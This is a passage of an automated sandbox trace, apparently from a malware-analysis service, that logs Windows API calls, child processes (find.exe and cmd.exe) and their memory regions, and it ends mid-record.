[0176.274] fprintf (in: _File=0x7ffbed90e240, _Format="%s" | out: _File=0x7ffbed90e240) returned 1 [0176.274] fflush (in: _File=0x7ffbed90e240 | out: _File=0x7ffbed90e240) returned 0 [0176.274] GetProcessHeap () returned 0x18bc67e0000 [0176.274] GetProcessHeap () returned 0x18bc67e0000 [0176.274] HeapValidate (hHeap=0x18bc67e0000, dwFlags=0x0, lpMem=0x18bc67e3fc0) returned 1 [0176.274] GetProcessHeap () returned 0x18bc67e0000 [0176.274] RtlSizeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, MemoryPointer=0x18bc67e3fc0) returned 0x6 [0176.274] RtlFreeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, BaseAddress=0x18bc67e3fc0) returned 1 [0176.274] __iob_func () returned 0x7ffbed90e210 [0176.274] _fileno (_File=0x7ffbed90e240) returned 1 [0176.274] _errno () returned 0x18bc6ad0840 [0176.274] _get_osfhandle (_FileHandle=1) returned 0x24 [0176.274] _errno () returned 0x18bc6ad0840 [0176.274] GetFileType (hFile=0x24) returned 0x3 [0176.274] lstrlenW (lpString="\n") returned 1 [0176.274] GetConsoleOutputCP () returned 0x1b5 [0176.275] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0176.275] GetConsoleOutputCP () returned 0x1b5 [0176.275] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x7ff7b7512600, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0176.275] fprintf (in: _File=0x7ffbed90e240, _Format="%s" | out: _File=0x7ffbed90e240) returned 1 [0176.275] fflush (in: _File=0x7ffbed90e240 | out: _File=0x7ffbed90e240) returned 0 [0176.276] RegCloseKey (hKey=0x7c) returned 0x0 [0176.276] GetProcessHeap () returned 0x18bc67e0000 [0176.276] GetProcessHeap () returned 0x18bc67e0000 [0176.276] HeapValidate (hHeap=0x18bc67e0000, dwFlags=0x0, lpMem=0x18bc67e9d60) returned 1 [0176.276] GetProcessHeap () returned 0x18bc67e0000 [0176.276] RtlSizeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, MemoryPointer=0x18bc67e9d60) returned 0x22 [0176.276] RtlFreeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, BaseAddress=0x18bc67e9d60) returned 1 [0176.277] GetProcessHeap () returned 0x18bc67e0000 [0176.277] GetProcessHeap () returned 0x18bc67e0000 [0176.277] HeapValidate (hHeap=0x18bc67e0000, dwFlags=0x0, lpMem=0x18bc67e3fa0) returned 1 [0176.277] GetProcessHeap () returned 0x18bc67e0000 [0176.277] RtlSizeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, MemoryPointer=0x18bc67e3fa0) returned 0x18 [0176.277] RtlFreeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, BaseAddress=0x18bc67e3fa0) returned 1 [0176.277] GetProcessHeap () returned 0x18bc67e0000 [0176.277] GetProcessHeap () returned 0x18bc67e0000 [0176.277] HeapValidate (hHeap=0x18bc67e0000, dwFlags=0x0, lpMem=0x18bc67e8c90) returned 1 [0176.277] GetProcessHeap () returned 0x18bc67e0000 [0176.277] RtlSizeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, MemoryPointer=0x18bc67e8c90) returned 0x20 [0176.277] RtlFreeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, BaseAddress=0x18bc67e8c90) returned 1 [0176.277] GetProcessHeap () returned 0x18bc67e0000 [0176.277] GetProcessHeap () returned 0x18bc67e0000 [0176.277] HeapValidate (hHeap=0x18bc67e0000, dwFlags=0x0, lpMem=0x18bc67ea010) returned 1 [0176.277] GetProcessHeap () returned 0x18bc67e0000 [0176.277] RtlSizeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, MemoryPointer=0x18bc67ea010) returned 0x1000 [0176.278] RtlFreeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, BaseAddress=0x18bc67ea010) returned 1 [0176.278] GetProcessHeap () returned 0x18bc67e0000 [0176.278] GetProcessHeap () returned 0x18bc67e0000 [0176.278] HeapValidate (hHeap=0x18bc67e0000, dwFlags=0x0, lpMem=0x18bc67e3fe0) returned 1 [0176.278] GetProcessHeap () returned 0x18bc67e0000 [0176.278] RtlSizeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, MemoryPointer=0x18bc67e3fe0) returned 0x18 [0176.278] RtlFreeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, BaseAddress=0x18bc67e3fe0) returned 1 [0176.278] GetProcessHeap () returned 0x18bc67e0000 [0176.278] GetProcessHeap () returned 0x18bc67e0000 [0176.278] HeapValidate (hHeap=0x18bc67e0000, dwFlags=0x0, lpMem=0x18bc67e8c00) returned 1 [0176.278] GetProcessHeap () returned 0x18bc67e0000 [0176.278] RtlSizeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, MemoryPointer=0x18bc67e8c00) returned 0x20 [0176.278] RtlFreeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, BaseAddress=0x18bc67e8c00) returned 1 [0176.278] GetProcessHeap () returned 0x18bc67e0000 [0176.278] GetProcessHeap () returned 0x18bc67e0000 [0176.279] HeapValidate (hHeap=0x18bc67e0000, dwFlags=0x0, lpMem=0x18bc67e8bd0) returned 1 [0176.279] GetProcessHeap () returned 0x18bc67e0000 [0176.279] RtlSizeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, MemoryPointer=0x18bc67e8bd0) returned 0x20 [0176.279] RtlFreeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, BaseAddress=0x18bc67e8bd0) returned 1 [0176.279] GetProcessHeap () returned 0x18bc67e0000 [0176.279] GetProcessHeap () returned 0x18bc67e0000 [0176.279] HeapValidate (hHeap=0x18bc67e0000, dwFlags=0x0, lpMem=0x18bc67e4bf0) returned 1 [0176.279] GetProcessHeap () returned 0x18bc67e0000 [0176.279] RtlSizeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, MemoryPointer=0x18bc67e4bf0) returned 0x18 [0176.279] RtlFreeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, BaseAddress=0x18bc67e4bf0) returned 1 [0176.279] GetProcessHeap () returned 0x18bc67e0000 [0176.279] GetProcessHeap () returned 0x18bc67e0000 [0176.280] HeapValidate (hHeap=0x18bc67e0000, dwFlags=0x0, lpMem=0x18bc67e8cc0) returned 1 [0176.280] GetProcessHeap () returned 0x18bc67e0000 [0176.280] RtlSizeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, MemoryPointer=0x18bc67e8cc0) returned 0x20 [0176.280] RtlFreeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, BaseAddress=0x18bc67e8cc0) returned 1 [0176.280] GetProcessHeap () returned 0x18bc67e0000 [0176.280] GetProcessHeap () returned 0x18bc67e0000 [0176.280] HeapValidate (hHeap=0x18bc67e0000, dwFlags=0x0, lpMem=0x18bc67e8b10) returned 1 [0176.280] GetProcessHeap () returned 0x18bc67e0000 [0176.280] RtlSizeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, MemoryPointer=0x18bc67e8b10) returned 0x1e [0176.280] RtlFreeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, BaseAddress=0x18bc67e8b10) returned 1 [0176.280] GetProcessHeap () returned 0x18bc67e0000 [0176.280] GetProcessHeap () returned 0x18bc67e0000 [0176.280] HeapValidate (hHeap=0x18bc67e0000, dwFlags=0x0, lpMem=0x18bc67e4960) returned 1 [0176.280] GetProcessHeap () returned 0x18bc67e0000 [0176.280] RtlSizeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, MemoryPointer=0x18bc67e4960) returned 0x18 [0176.280] RtlFreeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, BaseAddress=0x18bc67e4960) returned 1 [0176.280] GetProcessHeap () returned 0x18bc67e0000 [0176.280] GetProcessHeap () returned 0x18bc67e0000 [0176.280] HeapValidate (hHeap=0x18bc67e0000, dwFlags=0x0, lpMem=0x18bc67e8a50) returned 1 [0176.280] GetProcessHeap () returned 0x18bc67e0000 [0176.280] RtlSizeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, MemoryPointer=0x18bc67e8a50) returned 0x20 [0176.281] RtlFreeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, BaseAddress=0x18bc67e8a50) returned 1 [0176.281] GetProcessHeap () returned 0x18bc67e0000 [0176.281] GetProcessHeap () returned 0x18bc67e0000 [0176.281] HeapValidate (hHeap=0x18bc67e0000, dwFlags=0x0, lpMem=0x18bc67e4d10) returned 1 [0176.281] GetProcessHeap () returned 0x18bc67e0000 [0176.281] RtlSizeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, MemoryPointer=0x18bc67e4d10) returned 0x2 [0176.281] RtlFreeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, BaseAddress=0x18bc67e4d10) returned 1 [0176.281] GetProcessHeap () returned 0x18bc67e0000 [0176.281] GetProcessHeap () returned 0x18bc67e0000 [0176.281] HeapValidate (hHeap=0x18bc67e0000, dwFlags=0x0, lpMem=0x18bc67e48c0) returned 1 [0176.281] GetProcessHeap () returned 0x18bc67e0000 [0176.281] RtlSizeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, MemoryPointer=0x18bc67e48c0) returned 0x20 [0176.281] RtlFreeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, BaseAddress=0x18bc67e48c0) returned 1 [0176.281] GetProcessHeap () returned 0x18bc67e0000 [0176.281] GetProcessHeap () returned 0x18bc67e0000 [0176.281] HeapValidate (hHeap=0x18bc67e0000, dwFlags=0x0, lpMem=0x18bc67e48f0) returned 1 [0176.282] GetProcessHeap () returned 0x18bc67e0000 [0176.282] RtlSizeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, MemoryPointer=0x18bc67e48f0) returned 0x20 [0176.282] RtlFreeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, BaseAddress=0x18bc67e48f0) returned 1 [0176.282] GetProcessHeap () returned 0x18bc67e0000 [0176.282] GetProcessHeap () returned 0x18bc67e0000 [0176.282] HeapValidate (hHeap=0x18bc67e0000, dwFlags=0x0, lpMem=0x18bc67e8d20) returned 1 [0176.282] GetProcessHeap () returned 0x18bc67e0000 [0176.282] RtlSizeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, MemoryPointer=0x18bc67e8d20) returned 0x20 [0176.283] RtlFreeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, BaseAddress=0x18bc67e8d20) returned 1 [0176.283] GetProcessHeap () returned 0x18bc67e0000 [0176.283] GetProcessHeap () returned 0x18bc67e0000 [0176.283] HeapValidate (hHeap=0x18bc67e0000, dwFlags=0x0, lpMem=0x18bc67e89c0) returned 1 [0176.283] GetProcessHeap () returned 0x18bc67e0000 [0176.283] RtlSizeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, MemoryPointer=0x18bc67e89c0) returned 0x20 [0176.283] RtlFreeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, BaseAddress=0x18bc67e89c0) returned 1 [0176.283] GetProcessHeap () returned 0x18bc67e0000 [0176.283] GetProcessHeap () returned 0x18bc67e0000 [0176.283] HeapValidate (hHeap=0x18bc67e0000, dwFlags=0x0, lpMem=0x18bc67e4d30) returned 1 [0176.283] GetProcessHeap () returned 0x18bc67e0000 [0176.283] RtlSizeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, MemoryPointer=0x18bc67e4d30) returned 0x18 [0176.283] RtlFreeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, BaseAddress=0x18bc67e4d30) returned 1 [0176.283] GetProcessHeap () returned 0x18bc67e0000 [0176.283] GetProcessHeap () returned 0x18bc67e0000 [0176.284] HeapValidate (hHeap=0x18bc67e0000, dwFlags=0x0, lpMem=0x18bc67e8a20) returned 1 [0176.284] GetProcessHeap () returned 0x18bc67e0000 [0176.284] RtlSizeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, MemoryPointer=0x18bc67e8a20) returned 0x20 [0176.284] RtlFreeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, BaseAddress=0x18bc67e8a20) returned 1 [0176.284] GetProcessHeap () returned 0x18bc67e0000 [0176.284] GetProcessHeap () returned 0x18bc67e0000 [0176.284] HeapValidate (hHeap=0x18bc67e0000, dwFlags=0x0, lpMem=0x18bc67e8cf0) returned 1 [0176.284] GetProcessHeap () returned 0x18bc67e0000 [0176.284] RtlSizeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, MemoryPointer=0x18bc67e8cf0) returned 0x20 [0176.284] RtlFreeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, BaseAddress=0x18bc67e8cf0) returned 1 [0176.284] GetProcessHeap () returned 0x18bc67e0000 [0176.284] GetProcessHeap () returned 0x18bc67e0000 [0176.284] HeapValidate (hHeap=0x18bc67e0000, dwFlags=0x0, lpMem=0x18bc67e8a80) returned 1 [0176.284] GetProcessHeap () returned 0x18bc67e0000 [0176.284] RtlSizeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, MemoryPointer=0x18bc67e8a80) returned 0x20 [0176.285] RtlFreeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, BaseAddress=0x18bc67e8a80) returned 1 [0176.285] GetProcessHeap () returned 0x18bc67e0000 [0176.285] GetProcessHeap () returned 0x18bc67e0000 [0176.285] HeapValidate (hHeap=0x18bc67e0000, dwFlags=0x0, lpMem=0x18bc67e89f0) returned 1 [0176.285] GetProcessHeap () returned 0x18bc67e0000 [0176.285] RtlSizeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, MemoryPointer=0x18bc67e89f0) returned 0x20 [0176.285] RtlFreeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, BaseAddress=0x18bc67e89f0) returned 1 [0176.285] GetProcessHeap () returned 0x18bc67e0000 [0176.285] GetProcessHeap () returned 0x18bc67e0000 [0176.285] HeapValidate (hHeap=0x18bc67e0000, dwFlags=0x0, lpMem=0x18bc67e4920) returned 1 [0176.285] GetProcessHeap () returned 0x18bc67e0000 [0176.285] RtlSizeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, MemoryPointer=0x18bc67e4920) returned 0x18 [0176.285] RtlFreeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, BaseAddress=0x18bc67e4920) returned 1 [0176.285] GetProcessHeap () returned 0x18bc67e0000 [0176.285] GetProcessHeap () returned 0x18bc67e0000 [0176.287] HeapValidate (hHeap=0x18bc67e0000, dwFlags=0x0, lpMem=0x18bc67e8ba0) returned 1 [0176.288] GetProcessHeap () returned 0x18bc67e0000 [0176.288] RtlSizeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, MemoryPointer=0x18bc67e8ba0) returned 0x20 [0176.288] RtlFreeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, BaseAddress=0x18bc67e8ba0) returned 1 [0176.288] GetProcessHeap () returned 0x18bc67e0000 [0176.288] GetProcessHeap () returned 0x18bc67e0000 [0176.288] HeapValidate (hHeap=0x18bc67e0000, dwFlags=0x0, lpMem=0x18bc67e8b40) returned 1 [0176.288] GetProcessHeap () returned 0x18bc67e0000 [0176.288] RtlSizeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, MemoryPointer=0x18bc67e8b40) returned 0x20 [0176.289] RtlFreeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, BaseAddress=0x18bc67e8b40) returned 1 [0176.289] GetProcessHeap () returned 0x18bc67e0000 [0176.289] GetProcessHeap () returned 0x18bc67e0000 [0176.289] HeapValidate (hHeap=0x18bc67e0000, dwFlags=0x0, lpMem=0x18bc67e8c30) returned 1 [0176.289] GetProcessHeap () returned 0x18bc67e0000 [0176.289] RtlSizeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, MemoryPointer=0x18bc67e8c30) returned 0x20 [0176.289] RtlFreeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, BaseAddress=0x18bc67e8c30) returned 1 [0176.289] GetProcessHeap () returned 0x18bc67e0000 [0176.289] GetProcessHeap () returned 0x18bc67e0000 [0176.289] HeapValidate (hHeap=0x18bc67e0000, dwFlags=0x0, lpMem=0x18bc67e8c60) returned 1 [0176.289] GetProcessHeap () returned 0x18bc67e0000 [0176.289] RtlSizeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, MemoryPointer=0x18bc67e8c60) returned 0x20 [0176.290] RtlFreeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, BaseAddress=0x18bc67e8c60) returned 1 [0176.290] GetProcessHeap () returned 0x18bc67e0000 [0176.290] GetProcessHeap () returned 0x18bc67e0000 [0176.290] HeapValidate (hHeap=0x18bc67e0000, dwFlags=0x0, lpMem=0x18bc67e4940) returned 1 [0176.290] GetProcessHeap () returned 0x18bc67e0000 [0176.290] RtlSizeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, MemoryPointer=0x18bc67e4940) returned 0x18 [0176.290] RtlFreeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, BaseAddress=0x18bc67e4940) returned 1 [0176.290] GetProcessHeap () returned 0x18bc67e0000 [0176.290] GetProcessHeap () returned 0x18bc67e0000 [0176.290] HeapValidate (hHeap=0x18bc67e0000, dwFlags=0x0, lpMem=0x18bc67e8b70) returned 1 [0176.290] GetProcessHeap () returned 0x18bc67e0000 [0176.290] RtlSizeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, MemoryPointer=0x18bc67e8b70) returned 0x20 [0176.291] RtlFreeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, BaseAddress=0x18bc67e8b70) returned 1 [0176.291] GetProcessHeap () returned 0x18bc67e0000 [0176.291] GetProcessHeap () returned 0x18bc67e0000 [0176.291] HeapValidate (hHeap=0x18bc67e0000, dwFlags=0x0, lpMem=0x18bc67e4cf0) returned 1 [0176.291] GetProcessHeap () returned 0x18bc67e0000 [0176.291] RtlSizeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, MemoryPointer=0x18bc67e4cf0) returned 0x18 [0176.291] RtlFreeHeap (HeapHandle=0x18bc67e0000, Flags=0x0, BaseAddress=0x18bc67e4cf0) returned 1 [0176.291] exit (_Code=0) Thread: id = 52 os_tid = 0xd68 Process: id = "10" image_name = "find.exe" filename = "c:\\windows\\system32\\find.exe" page_root = "0x2d973000" os_pid = "0xd7c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x9e4" cmd_line = "find /i \"0x0\" " cur_dir = "C:\\Windows\\System32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ff75" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1118 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1119 start_va = 0x77ddeb0000 end_va = 0x77ddf2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000077ddeb0000" filename = "" Region: id = 1120 start_va = 0x77de000000 end_va = 0x77de1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000077de000000" filename = "" Region: id = 1121 start_va = 0x18453800000 end_va = 0x1845381ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000018453800000" filename = "" Region: id = 1122 start_va = 0x18453820000 end_va = 0x18453834fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000018453820000" filename = "" Region: id = 1123 start_va = 0x18453840000 end_va = 0x18453843fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000018453840000" filename = "" Region: id = 1124 start_va = 0x18453850000 end_va = 0x18453850fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000018453850000" filename = "" Region: id = 1125 start_va = 0x18453860000 end_va = 0x18453861fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000018453860000" filename = "" Region: id = 1126 start_va = 0x7df5ff6d0000 end_va = 0x7ff5ff6cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff6d0000" filename = "" Region: id = 1127 start_va = 0x7ff623560000 end_va = 0x7ff623582fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff623560000" filename = "" Region: id = 1128 start_va = 0x7ff6242d0000 end_va = 0x7ff6242d8fff monitored = 0 entry_point = 0x7ff6242d2380 region_type = mapped_file name = "find.exe" filename = "\\Windows\\System32\\find.exe" (normalized: "c:\\windows\\system32\\find.exe") Region: id = 1129 start_va = 0x7ffbed960000 end_va = 0x7ffbedb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1135 start_va = 0x18453870000 end_va = 0x18453afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000018453870000" filename = "" Region: id = 1136 start_va = 0x7ffbed570000 end_va = 0x7ffbed61cfff monitored = 0 entry_point = 0x7ffbed5881a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1137 start_va = 0x7ffbea3c0000 end_va = 0x7ffbea5a7fff monitored = 0 entry_point = 0x7ffbea3eba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1138 start_va = 0x18453800000 end_va = 0x1845380ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000018453800000" filename = "" Region: id = 1139 start_va = 0x7ff623460000 end_va = 0x7ff62355ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff623460000" filename = "" Region: id = 1145 start_va = 0x18453870000 end_va = 0x1845392dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1146 start_va = 0x18453a00000 end_va = 0x18453afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000018453a00000" filename = "" Region: id = 1154 start_va = 0x7ffbed880000 end_va = 0x7ffbed91cfff monitored = 0 entry_point = 0x7ffbed8878a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1155 start_va = 0x77ddf30000 end_va = 0x77ddfaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000077ddf30000" filename = "" Region: id = 1156 start_va = 0x7ffbe1690000 end_va = 0x7ffbe16c1fff monitored = 0 entry_point = 0x7ffbe169d480 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 1157 start_va = 0x18453930000 end_va = 0x1845398ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000018453930000" filename = "" Region: id = 1158 start_va = 0x18453810000 end_va = 0x18453816fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000018453810000" filename = "" Region: id = 1159 start_va = 0x18453930000 end_va = 0x18453936fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000018453930000" filename = "" Region: id = 1160 start_va = 0x18453980000 end_va = 0x1845398ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000018453980000" filename = "" Region: id = 1161 start_va = 0x7ffbe1860000 end_va = 0x7ffbe186dfff monitored = 0 entry_point = 0x7ffbe18645b0 region_type = mapped_file name = "fsutilext.dll" filename = "\\Windows\\System32\\fsutilext.dll" (normalized: "c:\\windows\\system32\\fsutilext.dll") Region: id = 1162 start_va = 0x18453b00000 end_va = 0x18453e36fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 51 os_tid = 0xd6c Thread: id = 53 os_tid = 0xce8 Process: id = "11" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x2d878000" os_pid = "0xcdc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x9e4" cmd_line = "C:\\Windows\\system32\\cmd.exe /c echo prompt $E | cmd" cur_dir = "C:\\Windows\\System32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ff75" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1163 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1164 start_va = 0x1271c00000 end_va = 0x1271dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000001271c00000" filename = "" Region: id = 1165 start_va = 0x1271e00000 end_va = 0x1271efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000001271e00000" filename = "" Region: id = 1166 start_va = 0x130b3d20000 end_va = 0x130b3d3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000130b3d20000" filename = "" Region: id = 1167 start_va = 0x130b3d40000 end_va = 0x130b3d54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000130b3d40000" filename = "" Region: id = 1168 start_va = 0x130b3d60000 end_va = 0x130b3d63fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000130b3d60000" filename = "" Region: id = 1169 start_va = 0x130b3d70000 end_va = 0x130b3d70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000130b3d70000" filename = "" Region: id = 1170 start_va = 0x130b3d80000 end_va = 0x130b3d81fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000130b3d80000" filename = "" Region: id = 1171 start_va = 0x7df5ff340000 end_va = 0x7ff5ff33ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff340000" filename = "" Region: id = 1172 start_va = 0x7ff7bcf40000 end_va = 0x7ff7bcf62fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7bcf40000" filename = "" Region: id = 1173 start_va = 0x7ff7bd6f0000 end_va = 0x7ff7bd749fff monitored = 1 entry_point = 0x7ff7bd7053f0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 1174 start_va = 0x7ffbed960000 end_va = 0x7ffbedb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1175 start_va = 0x130b3d90000 end_va = 0x130b3f0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000130b3d90000" filename = "" Region: id = 1176 start_va = 0x7ffbed570000 end_va = 0x7ffbed61cfff monitored = 0 entry_point = 0x7ffbed5881a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1177 start_va = 0x7ffbea3c0000 end_va = 0x7ffbea5a7fff monitored = 0 entry_point = 0x7ffbea3eba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1178 start_va = 0x130b3d20000 end_va = 0x130b3d2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000130b3d20000" filename = "" Region: id = 1179 start_va = 0x7ff7bce40000 end_va = 0x7ff7bcf3ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7bce40000" filename = "" Region: id = 1180 start_va = 0x130b3f10000 end_va = 0x130b3fcdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1181 start_va = 0x7ffbed880000 end_va = 0x7ffbed91cfff monitored = 0 entry_point = 0x7ffbed8878a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1182 start_va = 0x1271f00000 